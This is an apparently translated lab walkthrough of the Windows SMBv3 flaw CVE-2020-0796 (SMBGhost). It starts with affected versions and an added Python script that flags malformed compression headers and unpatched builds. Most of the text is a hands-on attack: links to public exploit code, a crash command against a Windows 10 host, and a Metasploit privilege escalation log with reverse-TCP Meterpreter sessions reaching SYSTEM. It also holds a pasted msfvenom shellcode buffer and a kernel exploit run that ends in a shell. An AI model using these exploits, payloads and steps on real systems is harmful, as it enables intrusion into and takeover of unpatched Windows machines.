Following EternalBlue in 2017, EternalDarkness has now surfaced; port 445 truly is a security engineer's nightmare.
Vulnerability overview #
Microsoft Windows and Microsoft Windows Server are both products of the US company Microsoft. Microsoft Windows is an operating system for personal devices, and Microsoft Windows Server is a server operating system. Server Message Block (SMB) is a server message transfer protocol included in them.
Microsoft Server Message Block 3.1.1 (SMBv3) contains an input validation vulnerability: when the SMBv3 protocol handles a malicious compressed packet it enters an incorrect code path. A remote, unauthenticated attacker can exploit this flaw to execute arbitrary code in the application. The following products and versions are affected: Microsoft Windows 10 version 1903, Windows Server version 1903, Windows 10 version 1909, and Windows Server version 1909.
Affected versions #
- Windows 10 Version 1903 for 32-bit Systems
- Windows 10 Version 1903 for ARM64-based Systems
- Windows 10 Version 1903 for x64-based Systems
- Windows 10 Version 1909 for 32-bit Systems
- Windows 10 Version 1909 for ARM64-based Systems
- Windows 10 Version 1909 for x64-based Systems
- Windows Server, version 1903 (Server Core installation)
- Windows Server, version 1909 (Server Core installation)
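The description above only says that SMBv3 "enters an incorrect code path" on a malicious compressed packet. The following is an added defensive example (my own code, not from the original post or from any of the linked PoC repositories) showing what a network sensor or an inventory script can actually check. It assumes the unchained SMB2 COMPRESSION_TRANSFORM_HEADER layout from MS-SMB2 section 2.2.42, that builds 18362 (1903) and 18363 (1909) below update build revision 720 (the level KB4551762 raised them to) are the affected ones, and uses constructed sample packets rather than real captures; the function names are mine.

```python
"""Defensive checks for CVE-2020-0796 (SMBGhost).

Added example for this write-up; it is not code from the original post or
from any of the linked PoC repositories.  Two pieces:
  * inspect_compression_header(): parses an SMB2 COMPRESSION_TRANSFORM_HEADER
    and reports the malformed-size conditions a sensor or SMB proxy should
    drop or alert on.
  * host_is_exposed(): a patch-level predicate over OS build / UBR / the
    DisableCompression workaround, for inventory or compliance scripts.
"""
import struct

# SMB2 COMPRESSION_TRANSFORM_HEADER (MS-SMB2 section 2.2.42), 16 bytes,
# little-endian: ProtocolId(4) = 0xFC534D42 ("\xfcSMB" on the wire),
# OriginalCompressedSegmentSize(4), CompressionAlgorithm(2), Flags(2),
# Offset(4).  The chained layout (Flags bit 0, Windows 10 2004 and later)
# is not handled here.
COMPRESSION_PROTOCOL_ID = 0xFC534D42
HEADER_FMT = "<IIHHI"
HEADER_LEN = struct.calcsize(HEADER_FMT)  # 16
ALGORITHMS = {0: "NONE", 1: "LZNT1", 2: "LZ77", 3: "LZ77+Huffman", 4: "Pattern_V1"}

# Servers cap MaxTransactSize/MaxReadSize/MaxWriteSize at 8 MiB, so a
# decompressed segment announced as larger than that is never legitimate.
MAX_SMB2_MESSAGE = 8 * 1024 * 1024

# Builds that shipped the flaw (1903 = 18362, 1909 = 18363) and the update
# build revision that KB4551762 raised both of them to.
VULNERABLE_BUILDS = (18362, 18363)
FIXED_UBR = 720


def parse_compression_header(packet: bytes):
    """Return the header fields as a dict, or None when the bytes are not an
    SMB2 compression transform message."""
    if len(packet) < HEADER_LEN:
        return None
    proto, orig_size, alg, flags, offset = struct.unpack_from(HEADER_FMT, packet)
    if proto != COMPRESSION_PROTOCOL_ID:
        return None
    return {
        "original_size": orig_size,
        "algorithm": ALGORITHMS.get(alg, "unknown(%d)" % alg),
        "flags": flags,
        "offset": offset,
        "payload_len": len(packet) - HEADER_LEN,
    }


def inspect_compression_header(packet: bytes):
    """Return a list of findings; an empty list means the header is
    plausible, a non-empty list means drop the message and alert."""
    hdr = parse_compression_header(packet)
    if hdr is None:
        return ["not an SMB2 compression transform message"]
    findings = []
    # Root cause of CVE-2020-0796: the unpatched server added
    # OriginalCompressedSegmentSize + Offset as a 32-bit value with no
    # overflow check, allocated the wrapped (tiny) size, then decompressed
    # the full segment into it.
    if hdr["original_size"] + hdr["offset"] > 0xFFFFFFFF:
        findings.append("OriginalCompressedSegmentSize + Offset overflows 32 bits")
    if hdr["original_size"] > MAX_SMB2_MESSAGE:
        findings.append("OriginalCompressedSegmentSize exceeds the 8 MiB SMB2 limit")
    if hdr["offset"] > hdr["payload_len"]:
        findings.append("Offset points past the end of the received data")
    if hdr["algorithm"].startswith("unknown"):
        findings.append("unknown CompressionAlgorithm " + hdr["algorithm"])
    return findings


def host_is_exposed(build: int, ubr: int, compression_disabled: bool = False) -> bool:
    """True when a Windows 10 / Server host (OS build + UBR as shown by
    winver or the registry) is still reachable through the flaw.
    compression_disabled mirrors DisableCompression=1 under
    HKLM\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters,
    Microsoft's interim workaround from ADV200005."""
    if build not in VULNERABLE_BUILDS:
        return False
    if ubr >= FIXED_UBR:
        return False
    return not compression_disabled


def make_sample(orig_size: int, alg: int, offset: int, payload: bytes) -> bytes:
    """Constructed test fixture (not a real capture): header + payload."""
    return struct.pack(HEADER_FMT, COMPRESSION_PROTOCOL_ID, orig_size, alg, 0, offset) + payload


# Constructed samples: a well-formed LZNT1 header and one whose sizes wrap.
BENIGN = make_sample(0x100, 1, 0, b"\x00" * 0x40)
WRAPPED = make_sample(0xFFFFFFFF, 1, 0x10, b"\x00" * 0x40)

if __name__ == "__main__":
    for name, pkt in (("benign", BENIGN), ("wrapped", WRAPPED)):
        print(name, inspect_compression_header(pkt) or ["ok"])
    print("1909 at UBR 592, compression on:", host_is_exposed(18363, 592))
    print("1909 at UBR 720, compression on:", host_is_exposed(18363, 720))
```

An empty finding list means the header is plausible. The 32-bit wrap of OriginalCompressedSegmentSize + Offset is exactly the condition the unpatched server failed to check, so it is the one worth alerting on first; the remaining checks catch headers that are simply broken. Until a host is patched, Microsoft's published workaround is DisableCompression=1 on the LanmanServer Parameters key together with blocking TCP 445 at the perimeter.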
Hands-on #
Required tools and image download links:
win10: ed2k://|file|cn_windows_10_business_editions_version_1903_x64_dvd_e001dd2c.iso|4815527936|47D4C57E638DF8BF74C59261E2CE702D|/
CVE-2020-0796 code execution / POC: http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip
CVE-2020-0796 code execution / EXP: https://github.com/chompie1337/SMBGhost_RCE_PoC
CVE-2020-0796 BSOD attack / EXP: https://github.com/eerykitty/CVE-2020-0796-PoC
CVE-2020-0796 local privilege escalation / EXP: https://github.com/danigargu/CVE-2020-0796
Environment setup: #
| Host | IP |
|---|---|
| kali | 192.168.142.19 |
| Win10 | 192.168.142.61 |
Windows version information (remember to turn off the firewall):


Required software:

BSOD attack: #
The EXP just downloaded is used here for the attack:

Attack the Win10 system:
# install the dependencies
python3 setup.py install
# run the program
python3 CVE-2020-0796.py 192.168.142.61
Local privilege escalation: #
Local privilege escalation can be done with the module shipped with msf, so it is tested through msf here and the program on GitHub is not tested:
msf6 exploit(multi/handler) > set lhost 192.168.142.19
lhost => 192.168.142.19
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.142.19:4444
[*] Sending stage (200262 bytes) to 192.168.142.61
[*] Meterpreter session 2 opened (192.168.142.19:4444 -> 192.168.142.61:51757) at 2020-11-08 15:28:20 +0800
meterpreter >
meterpreter > getuid
Server username: DESKTOP-RL1VAD8\wy
meterpreter > background
msf6 exploit(multi/handler) > search cve_2020
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/sap/cve_2020_6287_ws_add_user 2020-07-14 normal Yes SAP Unauthenticated WebService User Creation
1 exploit/linux/misc/cve_2020_13160_anydesk 2020-06-16 normal Yes AnyDesk GUI Format String Write
2 exploit/windows/local/cve_2020_0668_service_tracing 2020-02-11 excellent No Service Tracing Privilege Elevation Vulnerability
3 exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move 2020-03-10 excellent Yes Background Intelligent Transfer Service Arbitrary File Move Privilege Elevation Vulnerability
4 exploit/windows/local/cve_2020_0796_smbghost 2020-03-13 good Yes SMBv3 Compression Buffer Overflow
Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/local/cve_2020_0796_smbghost
msf6 exploit(multi/handler) > use 4
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/cve_2020_0796_smbghost) > show options
Module options (exploit/windows/local/cve_2020_0796_smbghost):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.142.19 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows 10 v1903-1909 x64
msf6 exploit(windows/local/cve_2020_0796_smbghost) > set session 2
session => 2
msf6 exploit(windows/local/cve_2020_0796_smbghost) > check
[*] The target appears to be vulnerable.
msf6 exploit(windows/local/cve_2020_0796_smbghost) > exploit
[*] Started reverse TCP handler on 192.168.142.19:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[*] Launching notepad to host the exploit...
[+] Process 908 launched.
[*] Reflectively injecting the exploit DLL into 908...
[*] Injecting exploit into 908...
[*] Exploit injected. Injecting payload into 908...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (200262 bytes) to 192.168.142.61
[*] Meterpreter session 3 opened (192.168.142.19:4444 -> 192.168.142.61:52288) at 2020-11-08 15:29:49 +0800
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > background
msf6 exploit(windows/local/cve_2020_0796_smbghost) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
2 meterpreter x64/windows DESKTOP-RL1VAD8\wy @ DESKTOP-RL1VAD8 192.168.142.19:4444 -> 192.168.142.61:51757 (192.168.142.61)
3 meterpreter x64/windows NT AUTHORITY\SYSTEM @ DESKTOP-RL1VAD8 192.168.142.19:4444 -> 192.168.142.61:52288 (192.168.142.61)
Code execution: #
First, test for the vulnerability with the Qianxin POC:

Download and extract the corresponding exp:
root@kali:~/SMBGhost_RCE_PoC-master# ll
总用量 56
-rwxrw-rw- 1 root root 19598 11月 8 10:42 exploit.py
-rwxrw-rw- 1 root root 8221 7月 3 02:49 kernel_shellcode.asm
-rwxrw-rw- 1 root root 4621 7月 3 02:49 lznt1.py
drwxr-xr-x 2 root root 4096 11月 8 10:45 __pycache__
-rwxrw-rw- 1 root root 1531 7月 3 02:49 README.md
-rwxrw-rw- 1 root root 5604 7月 3 02:49 smb_win.py
root@kali:~/SMBGhost_RCE_PoC-master#
Attack with the EXP. First, generate the payload with msfvenom:
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '\x00' -i 1 -f python
This yields data similar to the following:
buf = b""
buf += b"\x48\x31\xc9\x48\x81\xe9\xc2\xff\xff\xff\x48\x8d\x05"
buf += b"\xef\xff\xff\xff\x48\xbb\x15\xa5\x3f\x35\x7f\x5f\x38"
buf += b"\x9b\x48\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4"
buf += b"\xe9\xed\xbe\xd1\x8f\xa0\xc7\x64\xfd\x69\x3f\x35\x7f"
buf += b"\x1e\x69\xda\x45\xf7\x6e\x63\x37\x6e\xea\xfe\x5d\x2e"
buf += b"\x6d\x55\x37\xd4\x6a\x83\x5d\x2e\x6d\x15\x32\x6e\xf1"
buf += b"\xd3\x1a\x12\x75\x7f\x37\xd4\x4a\xcb\x5d\x94\xff\x99"
buf += b"\x43\x3e\x44\x99\x39\x85\x7e\xf4\xb6\x52\x79\x9a\xd4"
buf += b"\x47\xd2\x67\x3e\x0e\x70\x10\x47\x85\xb4\x77\x43\x17"
buf += b"\x39\x4b\x73\x24\x47\x2d\x74\x5d\x37\x1e\x67\xa5\x3f"
buf += b"\x35\xf4\xdf\xb0\x9b\x15\xa5\x77\xb0\xbf\x2b\x5f\xd3"
buf += b"\x14\x75\x6f\xbe\x37\x47\x7c\x10\x55\x85\x76\x34\xaf"
buf += b"\xbc\x6e\xd3\xea\x6c\x7e\xbe\x4b\xd7\x70\x9a\xc3\xe8"
buf += b"\x0e\xfc\x37\x6e\xf8\x37\x54\x64\xf6\x38\x3e\x5e\xf9"
buf += b"\xa3\xf5\xd0\xce\x79\x7c\x13\x1c\x93\x50\x9c\xee\x40"
buf += b"\xa7\x07\x7c\x10\x55\x81\x76\x34\xaf\x39\x79\x10\x19"
buf += b"\xed\x7b\xbe\x3f\x43\x71\x9a\xc5\xe4\xb4\x31\xf7\x17"
buf += b"\x39\x4b\x54\xfd\x7e\x6d\x21\x06\x62\xda\x4d\xe4\x66"
buf += b"\x74\x25\x17\xbb\x77\x35\xe4\x6d\xca\x9f\x07\x79\xc2"
buf += b"\x4f\xed\xb4\x27\x96\x14\xc7\x64\xea\xf8\x76\x8b\x08"
buf += b"\x2c\x0a\xc4\x26\x97\x3f\x35\x3e\x09\x71\x12\xf3\xed"
buf += b"\xbe\xd9\xdf\x5e\x38\x9b\x5c\x2c\xda\x7d\x4e\x9f\x68"
buf += b"\xcb\x5c\x62\xfb\x37\x7f\x4e\x64\xda\x41\xec\xb6\xd1"
buf += b"\x33\xd6\xc9\xda\xaf\xe9\x48\x13\x78\xa0\xed\xd7\x9c"
buf += b"\x4f\x57\x34\x7e\x5f\x38\xc2\x54\x1f\x16\xb5\x14\x5f"
buf += b"\xc7\x4e\x7f\xa7\x66\x65\x2f\x12\x09\x52\x58\x94\xff"
buf += b"\x7d\x80\x9f\x70\x12\xd7\xe4\x85\xdf\x70\x80\xd8\x64"
buf += b"\xc0\xed\xb6\xf2\x15\x4f\x79\xc3\x59\x2c\xdd\x7d\xf6"
buf += b"\xa6\x79\x21\xd7\x7e\x08\x52\x80\x8a\x70\xaa\xc7\xed"
buf += b"\xb6\xcc\x3e\xe5\x8f\x72\x2d\x5a\xc0\xe0\x32\x6e\xf8"
buf += b"\xd3\x24\x77\x77\xbc\x86\x1e\x82\xef\xf9\x9e\xde\xca"
buf += b"\xaa\x17\xb1\x62\x5d\x2c\xf8\x74\xc5\x2a\x56\xd6\x74"
buf += b"\x5a\xea\x7d\xfe\x9b\x88\x99\x15\xa5\x77\xb6\x93\x4f"
buf += b"\x70\x12\xf7\xe8\x0e\xfc\x15\x5b\x79\xc3\x5d\x2c\xc6"
buf += b"\x74\xc5\x5d\xe1\x53\x4a\x5a\xea\x7d\xfc\x9b\x18\xc5"
buf += b"\x9c\x53\x55\x75\x3e\x06\x50\x9b\x05\xa5\x3f\x74\x27"
buf += b"\x17\xb1\x69\x5d\x94\xf6\x74\xc5\x07\x9c\xc8\xf0\x5a"
buf += b"\xea\x7d\xf6\x9c\x71\x12\xd2\xe8\x0e\xfc\x36\xd6\xc8"
buf += b"\xd3\x9c\x7f\x77\xbc\x86\x1e\x82\x99\xcc\x6d\x60\xca"
buf += b"\xaa\x17\x39\x58\x5d\x8c\xf9\x7d\xfa\xa9\x4d\x7a\x54"
buf += b"\x5a\xd8\x6d\x15\x5f\x61\xd2\xd2\x67\xcf\x80\xdd\x09"
buf += b"\xc7\x4e"
Replace USER_PAYLOAD in the exploit.py file with the content above:
First, delete the original USER_PAYLOAD data:

Paste in the payload data just generated:

Use :90,135s/buf/USER_PAYLOAD/g to replace every buf on lines 90 to 135 with USER_PAYLOAD:

Start a listener with the exploit/multi/handler module:
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/bind_tcp
payload => windows/x64/meterpreter/bind_tcp
msf6 exploit(multi/handler) > set rhost 192.168.142.61
rhost => 192.168.142.61
msf6 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/x64/meterpreter/bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LPORT 4444 yes The listen port
RHOST 192.168.142.61 no The target address
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf6 exploit(multi/handler) > exploit
[*] Started bind TCP handler against 192.168.142.61:4444
Then attack the server with the exp:
root@kali:~/SMBGhost_RCE_PoC-master# python3 exploit.py -ip 192.168.142.61
[+] found low stub at phys addr 13000!
[+] PML4 at 1ad000
[+] base of HAL heap at fffff7f540000000
[+] found PML4 self-ref entry 10d
[+] found HalpInterruptController at fffff7f540001478
[+] found HalpApicRequestInterrupt at fffff80216ab3bb0
[+] built shellcode!
[+] KUSER_SHARED_DATA PTE at ffff86fbc0000000
[+] KUSER_SHARED_DATA PTE NX bit cleared!
[+] Wrote shellcode at fffff78000000950!
[+] Press a key to execute shellcode!
At this step press Enter, and the shell pops up:

Notice: #
This article is for academic exchange only; do not use it for any illegal purpose.